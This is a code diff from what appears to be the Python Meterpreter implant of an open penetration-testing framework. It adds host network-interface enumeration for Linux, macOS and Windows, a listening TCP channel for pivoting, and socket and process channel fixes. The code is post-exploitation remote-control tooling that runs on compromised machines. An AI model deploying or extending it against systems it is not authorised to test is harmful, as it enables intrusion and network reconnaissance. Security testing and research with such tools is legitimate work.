("seq", ctypes.c_uint32),
("pid", ctypes.c_uint32)]
class RTATTR(ctypes.Structure):
_fields_ = [("len", ctypes.c_uint16),
("type", ctypes.c_uint16)]
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV Specific Types
@@ -135,16 +292,21 @@ TLV_TYPE_SEARCH_RESULTS = TLV_META_TYPE_GROUP | 1233
##
TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400
TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401
TLV_TYPE_INTERFACE_MTU = TLV_META_TYPE_UINT | 1402
TLV_TYPE_INTERFACE_FLAGS = TLV_META_TYPE_STRING | 1403
TLV_TYPE_INTERFACE_INDEX = TLV_META_TYPE_UINT | 1404
TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420
TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421
TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422
TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423
TLV_TYPE_IP_PREFIX = TLV_META_TYPE_UINT | 1424
TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430
TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431
TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432
TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
TLV_TYPE_IP6_SCOPE = TLV_META_TYPE_RAW | 1434
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
@@ -290,9 +452,39 @@ ERROR_FAILURE = 1
# errors.
ERROR_CONNECTION_ERROR = 10000
# Windows Constants
GAA_FLAG_SKIP_ANYCAST = 0x0002
GAA_FLAG_SKIP_MULTICAST = 0x0004
GAA_FLAG_INCLUDE_PREFIX = 0x0010
GAA_FLAG_SKIP_DNS_SERVER = 0x0080
WIN_AF_INET = 2
WIN_AF_INET6 = 23
# Linux Constants
RTM_GETLINK = 18
RTM_GETADDR = 22
RTM_GETROUTE = 26
IFLA_ADDRESS = 1
IFLA_BROADCAST = 2
IFLA_IFNAME = 3
IFLA_MTU = 4
IFA_ADDRESS = 1
IFA_LABEL = 3
def calculate_32bit_netmask(bits):
if bits == 32:
return 0xffffffff
return ((0xffffffff << (32-(bits%32))) & 0xffffffff)
def cstruct_unpack(structure, raw_data):
if not isinstance(structure, ctypes.Structure):
structure = structure()
ctypes.memmove(ctypes.byref(structure), raw_data, ctypes.sizeof(structure))
return structure
def get_stat_buffer(path):
si = os.stat(path)
rdev = 0
@@ -310,20 +502,30 @@ def get_stat_buffer(path):
st_buf += struct.pack('<II', blksize, blocks)
return st_buf
def inet_pton(family, address):
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
def netlink_request(req_type):
# See RFC 3549
NLM_F_REQUEST = 0x0001
NLM_F_ROOT = 0x0100
NLMSG_ERROR = 0x0002
NLMSG_DONE = 0x0003
sock = socket.socket(socket.AF_NETLINK, socket.SOCK_RAW, socket.NETLINK_ROUTE)
sock.bind((os.getpid(), 0))
seq = int(time.time())
nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC)
sfd = os.fdopen(sock.fileno(), 'w+b')
sfd.write(nlmsg)
responses = []
response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
while response.type != NLMSG_DONE:
if response.type == NLMSG_ERROR:
break
response_data = sfd.read(response.len - 16)
responses.append(response_data)
response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
sfd.close()
sock.close()
return responses
def resolve_host(hostname, family):
address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0]
@@ -338,8 +540,17 @@ def windll_GetNativeSystemInfo():
ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo))
return {0:PROCESS_ARCH_X86, 6:PROCESS_ARCH_IA64, 9:PROCESS_ARCH_X64}.get(sysinfo.wProcessorArchitecture, PROCESS_ARCH_UNKNOWN)
def windll_GetVersion():
if not has_windll:
return None
dwVersion = ctypes.windll.kernel32.GetVersion()
dwMajorVersion = (dwVersion & 0x000000ff)
dwMinorVersion = ((dwVersion & 0x0000ff00) >> 8)
dwBuild = ((dwVersion & 0xffff0000) >> 16)
return type('Version', (object,), dict(dwMajorVersion = dwMajorVersion, dwMinorVersion = dwMinorVersion, dwBuild = dwBuild))
@meterpreter.register_function
def channel_create_stdapi_fs_file(request, response):
def channel_open_stdapi_fs_file(request, response):
fpath = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
fmode = packet_get_tlv(request, TLV_TYPE_FILE_MODE)
if fmode:
@@ -353,7 +564,7 @@ def channel_create_stdapi_fs_file(request, response):
return ERROR_SUCCESS, response
@meterpreter.register_function
def channel_create_stdapi_net_tcp_client(request, response):
def channel_open_stdapi_net_tcp_client(request, response):
host = packet_get_tlv(request, TLV_TYPE_PEER_HOST)['value']
port = packet_get_tlv(request, TLV_TYPE_PEER_PORT)['value']
local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST)
@@ -373,7 +584,19 @@ def channel_create_stdapi_net_tcp_client(request, response):
pass
if not connected:
return ERROR_CONNECTION_ERROR, response
channel_id = meterpreter.add_channel(sock)
channel_id = meterpreter.add_channel(MeterpreterSocketClient(sock))
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
return ERROR_SUCCESS, response
@meterpreter.register_function
def channel_open_stdapi_net_tcp_server(request, response):
local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST).get('value', '0.0.0.0')
local_port = packet_get_tlv(request, TLV_TYPE_LOCAL_PORT)['value']
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_sock.bind((local_host, local_port))
server_sock.listen(socket.SOMAXCONN)
channel_id = meterpreter.add_channel(MeterpreterSocketServer(server_sock))
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
return ERROR_SUCCESS, response
@@ -675,12 +898,12 @@ def stdapi_fs_ls(request, response):
@meterpreter.register_function
def stdapi_fs_md5(request, response):
if sys.version_info[0] == 2 and sys.version_info[1] < 5:
import md5
m = md5.new()
else:
try:
import hashlib
m = hashlib.md5()
except ImportError:
import md5
m = md5.new()
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
m.update(open(path, 'rb').read())
response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
@@ -722,12 +945,12 @@ def stdapi_fs_separator(request, response):
@meterpreter.register_function
def stdapi_fs_sha1(request, response):
if sys.version_info[0] == 2 and sys.version_info[1] < 5:
import sha1
m = sha1.new()
else:
try:
import hashlib
m = hashlib.sha1()
except ImportError:
import sha
m = sha.new()
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
m.update(open(path, 'rb').read())
response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
@@ -740,6 +963,235 @@ def stdapi_fs_stat(request, response):
response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_config_get_interfaces(request, response):
if hasattr(socket, 'AF_NETLINK'):
interfaces = stdapi_net_config_get_interfaces_via_netlink()
elif has_osxsc:
interfaces = stdapi_net_config_get_interfaces_via_osxsc()
elif has_windll:
interfaces = stdapi_net_config_get_interfaces_via_windll()
else:
return ERROR_FAILURE, response
for iface_info in interfaces:
iface_tlv = ''
iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown'))
iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00'))
if 'mtu' in iface_info:
iface_tlv += tlv_pack(TLV_TYPE_INTERFACE_MTU, iface_info['mtu'])
if 'flags' in iface_info:
iface_tlv += tlv_pack(TLV_TYPE_INTERFACE_FLAGS, iface_info['flags'])
iface_tlv += tlv_pack(TLV_TYPE_INTERFACE_INDEX, iface_info['index'])
for address in iface_info.get('addrs', []):
iface_tlv += tlv_pack(TLV_TYPE_IP, address[1])
if isinstance(address[2], (int, long)):
iface_tlv += tlv_pack(TLV_TYPE_IP_PREFIX, address[2])
else:
iface_tlv += tlv_pack(TLV_TYPE_NETMASK, address[2])
response += tlv_pack(TLV_TYPE_NETWORK_INTERFACE, iface_tlv)
return ERROR_SUCCESS, response
def stdapi_net_config_get_interfaces_via_netlink():
rta_align = lambda l: l+3 & ~3
iface_flags = {
0x0001: 'UP',
0x0002: 'BROADCAST',
0x0008: 'LOOPBACK',
0x0010: 'POINTTOPOINT',
0x0040: 'RUNNING',
0x0100: 'PROMISC',
0x1000: 'MULTICAST'
}
iface_flags_sorted = iface_flags.keys()
# Dictionaries don't maintain order
iface_flags_sorted.sort()
interfaces = {}
responses = netlink_request(RTM_GETLINK)
for res_data in responses:
iface = cstruct_unpack(IFINFOMSG, res_data)
iface_info = {'index':iface.index}
flags = []
for flag in iface_flags_sorted:
if (iface.flags & flag):
flags.append(iface_flags[flag])
iface_info['flags'] = ' '.join(flags)
cursor = ctypes.sizeof(IFINFOMSG)
while cursor < len(res_data):
attribute = cstruct_unpack(RTATTR, res_data[cursor:])
at_len = attribute.len
attr_data = res_data[cursor + ctypes.sizeof(RTATTR):(cursor + at_len)]
cursor += rta_align(at_len)
if attribute.type == IFLA_ADDRESS:
iface_info['hw_addr'] = attr_data
elif attribute.type == IFLA_IFNAME:
iface_info['name'] = attr_data
elif attribute.type == IFLA_MTU:
iface_info['mtu'] = struct.unpack('<I', attr_data)[0]
interfaces[iface.index] = iface_info
responses = netlink_request(RTM_GETADDR)
for res_data in responses:
iface = cstruct_unpack(IFADDRMSG, res_data)
if not iface.family in (socket.AF_INET, socket.AF_INET6):
continue
iface_info = interfaces.get(iface.index, {})
cursor = ctypes.sizeof(IFADDRMSG)
while cursor < len(res_data):
attribute = cstruct_unpack(RTATTR, res_data[cursor:])
at_len = attribute.len
attr_data = res_data[cursor + ctypes.sizeof(RTATTR):(cursor + at_len)]
cursor += rta_align(at_len)
if attribute.type == IFA_ADDRESS:
nm_bits = iface.prefixlen
if iface.family == socket.AF_INET:
netmask = struct.pack('!I', calculate_32bit_netmask(nm_bits))
else:
if nm_bits >= 96:
netmask = struct.pack('!iiiI', -1, -1, -1, calculate_32bit_netmask(nm_bits))
elif nm_bits >= 64:
netmask = struct.pack('!iiII', -1, -1, calculate_32bit_netmask(nm_bits), 0)
elif nm_bits >= 32:
netmask = struct.pack('!iIII', -1, calculate_32bit_netmask(nm_bits), 0, 0)
else:
netmask = struct.pack('!IIII', calculate_32bit_netmask(nm_bits), 0, 0, 0)
addr_list = iface_info.get('addrs', [])
addr_list.append((iface.family, attr_data, netmask))
iface_info['addrs'] = addr_list
elif attribute.type == IFA_LABEL:
iface_info['name'] = attr_data
interfaces[iface.index] = iface_info
return interfaces.values()
def stdapi_net_config_get_interfaces_via_osxsc():
ds = osxsc.SCDynamicStoreCreate(None, 'GetInterfaceInformation', None, None)
entities = []
entities.append(osxsc.SCDynamicStoreKeyCreateNetworkInterfaceEntity(None, osxsc.kSCDynamicStoreDomainState, osxsc.kSCCompAnyRegex, osxsc.kSCEntNetIPv4))
entities.append(osxsc.SCDynamicStoreKeyCreateNetworkInterfaceEntity(None, osxsc.kSCDynamicStoreDomainState, osxsc.kSCCompAnyRegex, osxsc.kSCEntNetIPv6))
patterns = osxsc.CFArrayCreate(None, entities, len(entities), osxsc.kCFTypeArrayCallBacks)
values = osxsc.SCDynamicStoreCopyMultiple(ds, None, patterns)
interfaces = {}
for key, value in values.items():
iface_name = key.split('/')[3]
iface_info = interfaces.get(iface_name, {})
iface_info['name'] = str(iface_name)
if key.endswith('IPv4'):
family = socket.AF_INET
elif key.endswith('IPv6'):
family = socket.AF_INET6
else:
continue
iface_addresses = iface_info.get('addrs', [])
for idx in range(len(value['Addresses'])):
if family == socket.AF_INET:
iface_addresses.append((family, inet_pton(family, value['Addresses'][idx]), inet_pton(family, value['SubnetMasks'][idx])))
else:
iface_addresses.append((family, inet_pton(family, value['Addresses'][idx]), value['PrefixLength'][idx]))
iface_info['addrs'] = iface_addresses
interfaces[iface_name] = iface_info
for iface_ref in osxsc.SCNetworkInterfaceCopyAll():
iface_name = osxsc.SCNetworkInterfaceGetBSDName(iface_ref)
if not iface_name in interfaces:
iface_type = osxsc.SCNetworkInterfaceGetInterfaceType(iface_ref)
if not iface_type in ['Ethernet', 'IEEE80211']:
continue
interfaces[iface_name] = {'name': str(iface_name)}
iface_info = interfaces[iface_name]
mtu = osxsc.SCNetworkInterfaceCopyMTU(iface_ref, None, None, None)[1]
iface_info['mtu'] = mtu
hw_addr = osxsc.SCNetworkInterfaceGetHardwareAddressString(iface_ref)
if hw_addr:
hw_addr = hw_addr.replace(':', '')
hw_addr = hw_addr.decode('hex')
iface_info['hw_addr'] = hw_addr
ifnames = interfaces.keys()
ifnames.sort()
for iface_name, iface_info in interfaces.items():
iface_info['index'] = ifnames.index(iface_name)
return interfaces.values()
def stdapi_net_config_get_interfaces_via_windll():
iphlpapi = ctypes.windll.iphlpapi
if not hasattr(iphlpapi, 'GetAdaptersAddresses'):
return stdapi_net_config_get_interfaces_via_windll_mib()
Flags = (GAA_FLAG_INCLUDE_PREFIX | GAA_FLAG_SKIP_DNS_SERVER | GAA_FLAG_SKIP_MULTICAST | GAA_FLAG_SKIP_ANYCAST)
AdapterAddresses = ctypes.c_void_p()
SizePointer = ctypes.c_ulong()
SizePointer.value = 0
iphlpapi.GetAdaptersAddresses(socket.AF_UNSPEC, Flags, None, AdapterAddresses, ctypes.byref(SizePointer))
AdapterAddressesData = (ctypes.c_uint8 * SizePointer.value)()
iphlpapi.GetAdaptersAddresses(socket.AF_UNSPEC, Flags, None, ctypes.byref(AdapterAddressesData), ctypes.byref(SizePointer))
AdapterAddresses = ctypes.string_at(ctypes.byref(AdapterAddressesData), SizePointer.value)
AdapterAddresses = cstruct_unpack(IP_ADAPTER_ADDRESSES, AdapterAddresses)
if AdapterAddresses.u.s.Length <= 72:
return stdapi_net_config_get_interfaces_via_windll_mib()
win_version = windll_GetVersion()
interfaces = []
pAdapterAddresses = ctypes.byref(AdapterAddresses)
while pAdapterAddresses:
AdapterAddresses = cstruct_unpack(IP_ADAPTER_ADDRESSES, pAdapterAddresses)
pAdapterAddresses = AdapterAddresses.Next
pFirstPrefix = AdapterAddresses.FirstPrefix
iface_info = {}
iface_info['index'] = AdapterAddresses.u.s.IfIndex
if AdapterAddresses.PhysicalAddressLength:
iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength)
iface_info['name'] = str(ctypes.wstring_at(AdapterAddresses.Description))
iface_info['mtu'] = AdapterAddresses.Mtu
pUniAddr = AdapterAddresses.FirstUnicastAddress
while pUniAddr:
UniAddr = cstruct_unpack(IP_ADAPTER_UNICAST_ADDRESS, pUniAddr)
pUniAddr = UniAddr.Next
address = cstruct_unpack(SOCKADDR, UniAddr.Address.lpSockaddr)
if not address.sa_family in (socket.AF_INET, socket.AF_INET6):
continue
prefix = 0
if win_version.dwMajorVersion >= 6:
prefix = UniAddr.OnLinkPrefixLength
elif pFirstPrefix:
ip_adapter_prefix = 'QPPIL'
prefix_data = ctypes.string_at(pFirstPrefix, struct.calcsize(ip_adapter_prefix))
prefix = struct.unpack(ip_adapter_prefix, prefix_data)[4]
iface_addresses = iface_info.get('addrs', [])
if address.sa_family == socket.AF_INET:
iface_addresses.append((socket.AF_INET, ctypes.string_at(ctypes.byref(address.sa_data), 6)[2:], prefix))
else:
iface_addresses.append((socket.AF_INET6, ctypes.string_at(ctypes.byref(address.sa_data), 22)[6:], prefix))
iface_info['addrs'] = iface_addresses
interfaces.append(iface_info)
return interfaces
def stdapi_net_config_get_interfaces_via_windll_mib():
iphlpapi = ctypes.windll.iphlpapi
table = (ctypes.c_uint8 * (ctypes.sizeof(MIB_IPADDRROW) * 33))()
pdwSize = ctypes.c_ulong()
pdwSize.value = ctypes.sizeof(table)
if (iphlpapi.GetIpAddrTable(ctypes.byref(table), ctypes.byref(pdwSize), True) != 0):
return None
interfaces = []
table_data = ctypes.string_at(table, pdwSize.value)
entries = struct.unpack('I', table_data[:4])[0]
table_data = table_data[4:]
for i in xrange(entries):
addrrow = cstruct_unpack(MIB_IPADDRROW, table_data)
ifrow = MIB_IFROW()
ifrow.dwIndex = addrrow.dwIndex
if iphlpapi.GetIfEntry(ctypes.byref(ifrow)) != 0:
continue
iface_info = {}
table_data = table_data[ctypes.sizeof(MIB_IPADDRROW):]
iface_info['index'] = addrrow.dwIndex
iface_info['addrs'] = [(socket.AF_INET, struct.pack('<I', addrrow.dwAddr), struct.pack('<I', addrrow.dwMask))]
if ifrow.dwPhysAddrLen:
iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(ifrow.bPhysAddr), ifrow.dwPhysAddrLen)
if ifrow.dwDescrLen:
iface_info['name'] = ifrow.bDescr
iface_info['mtu'] = ifrow.dwMtu
interfaces.append(iface_info)
return interfaces
@meterpreter.register_function
def stdapi_net_resolve_host(request, response):
hostname = packet_get_tlv(request, TLV_TYPE_HOST_NAME)['value']
@@ -776,9 +1228,10 @@ def stdapi_net_resolve_hosts(request, response):
@meterpreter.register_function
def stdapi_net_socket_tcp_shutdown(request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
how = packet_get_tlv(request, TLV_TYPE_SHUTDOWN_HOW).get('value', socket.SHUT_RDWR)
channel = meterpreter.channels[channel_id]
channel.close()
channel.shutdown(how)
return ERROR_SUCCESS, response
@meterpreter.register_function_windll
data/meterpreter/ext_server_stdapi.x64.dll
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_stdapi.x86.dll
BIN
View File
Binary file not shown.
data/meterpreter/meterpreter.py
+131 -60
View File
@@ -1,6 +1,12 @@
#!/usr/bin/python
import code
import ctypes
try:
import ctypes
except:
has_windll = False
else:
has_windll = hasattr(ctypes, 'windll')
import os
import random
import select
@@ -10,14 +16,12 @@ import subprocess
import sys
import threading
has_windll = hasattr(ctypes, 'windll')
#
# Constants
#
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
@@ -25,74 +29,103 @@ ERROR_SUCCESS = 0
ERROR_FAILURE = 1
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_PARENTID = TLV_META_TYPE_UINT | 55
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402
TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402
TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
EXPORTED_SYMBOLS = {}
def export(symbol):
EXPORTED_SYMBOLS[symbol.__name__] = symbol
return symbol
def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in xrange(32))
@export
def inet_pton(family, address):
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
@export
def packet_get_tlv(pkt, tlv_type):
offset = 0
while (offset < len(pkt)):
@@ -111,6 +144,7 @@ def packet_get_tlv(pkt, tlv_type):
offset += tlv[0]
return {}
@export
def packet_enum_tlvs(pkt, tlv_type = None):
offset = 0
while (offset < len(pkt)):
@@ -129,6 +163,7 @@ def packet_enum_tlvs(pkt, tlv_type = None):
offset += tlv[0]
raise StopIteration()
@export
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]}
@@ -149,6 +184,25 @@ def tlv_pack(*args):
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
return data
#@export
class MeterpreterSocket(object):
def __init__(self, sock):
self.sock = sock
def __getattr__(self, name):
return getattr(self.sock, name)
export(MeterpreterSocket)
#@export
class MeterpreterSocketClient(MeterpreterSocket):
pass
export(MeterpreterSocketClient)
#@export
class MeterpreterSocketServer(MeterpreterSocket):
pass
export(MeterpreterSocketServer)
class STDProcessBuffer(threading.Thread):
def __init__(self, std, is_alive):
threading.Thread.__init__(self)
@@ -158,15 +212,10 @@ class STDProcessBuffer(threading.Thread):
self.data_lock = threading.RLock()
def run(self):
while self.is_alive():
byte = self.std.read(1)
for byte in iter(lambda: self.std.read(1), ''):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
data = self.std.read()
self.data_lock.acquire()
self.data += data
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
@@ -183,6 +232,7 @@ class STDProcessBuffer(threading.Thread):
self.data_lock.release()
return data
#@export
class STDProcess(subprocess.Popen):
def __init__(self, *args, **kwargs):
subprocess.Popen.__init__(self, *args, **kwargs)
@@ -192,6 +242,7 @@ class STDProcess(subprocess.Popen):
self.stdout_reader.start()
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
self.stderr_reader.start()
export(STDProcess)
class PythonMeterpreter(object):
def __init__(self, socket):
@@ -206,10 +257,12 @@ class PythonMeterpreter(object):
def register_function(self, func):
self.extension_functions[func.__name__] = func
return func
def register_function_windll(self, func):
if has_windll:
self.register_function(func)
return func
def add_channel(self, channel):
idx = 0
@@ -240,7 +293,8 @@ class PythonMeterpreter(object):
self.socket.send(response)
else:
channels_for_removal = []
channel_ids = self.channels.keys() # iterate over the keys because self.channels could be modified if one is closed
# iterate over the keys because self.channels could be modified if one is closed
channel_ids = self.channels.keys()
for channel_id in channel_ids:
channel = self.channels[channel_id]
data = ''
@@ -253,7 +307,7 @@ class PythonMeterpreter(object):
data = channel.stderr_reader.read()
elif channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
elif isinstance(channel, socket._socketobject):
elif isinstance(channel, MeterpreterSocketClient):
while len(select.select([channel.fileno()], [], [], 0)[0]):
try:
